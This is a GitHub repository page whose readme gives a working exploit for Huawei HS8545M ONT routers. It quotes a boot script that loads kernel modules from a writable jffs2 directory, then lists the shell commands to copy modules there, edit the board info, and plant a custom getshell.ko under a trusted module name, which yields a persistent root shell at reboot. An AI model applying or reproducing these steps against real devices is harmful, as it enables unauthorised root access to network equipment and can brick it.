Skip to content

0neday/Exploit-HS8545M-ONT

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

34 Commits

allshell

allshell

 
 

mnt/jffs2

mnt/jffs2

 
 

persist-root-shell

persist-root-shell

 
 

readme.md

readme.md

 
 

Repository files navigation

Note

This maybe brick your ONT device, use at your own risk!

Usage

Find an exploit to load userdefined ko module

an exploit in /etc/rc.d/rc.start/1.sdk_init.sh, use kernel module .ko to run a shell script /mnt/jffs2/hw/getshell.sh when system reboot.

Logical exploit in line 200-206

# load hisi modules
if [ -f /mnt/jffs2/TranStar/hi_sysctl.ko ]; then
	  cd /mnt/jffs2/TranStar/
	  echo "Loading the Temp HISI SD511X modules: "
else
	  cd /lib/modules/hisi_sdk
	  echo "Loading the HISI SD511X modules: "
fi

if /mnt/jffs2/TranStar/hi_sysctl.ko exsit, then execute cd /mnt/jffs2/TranStar/. That means work directory is /mnt/jffs2/TranStar/ now, and /mnt/jffs2/TranStar/ is writable. so

mkdir -p /mnt/jffs2/TranStar/
cp -rf /lib/modules/hisi_sdk/* /mnt/jffs2/TranStar/

In order to excute line 261-262, change in /mnt/jffs2/hw_boardinfo

obj.id = "0x00000001" ; obj.value = "4";

Upload getshell.ko module, compiled by 0neday, only support r019

# just for gpon
cp getshell.ko /mnt/jffs2/TranStar/hi_epon.ko

# or for epon
cp getshell.ko /mnt/jffs2/TranStar/hi_gpon.ko

License

GPLv3.0

About

Exploit Huawei ONT device, only support r019. You need to compile kernel module getshell.ko for r018 or r017 by yourself.

vps.gitbook.io/discount/

Topics

huawei ont expoit hs8145v5 hs8545m5

Resources

Readme
Activity

Stars

31 stars

Watchers

3 watching

Forks

17 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages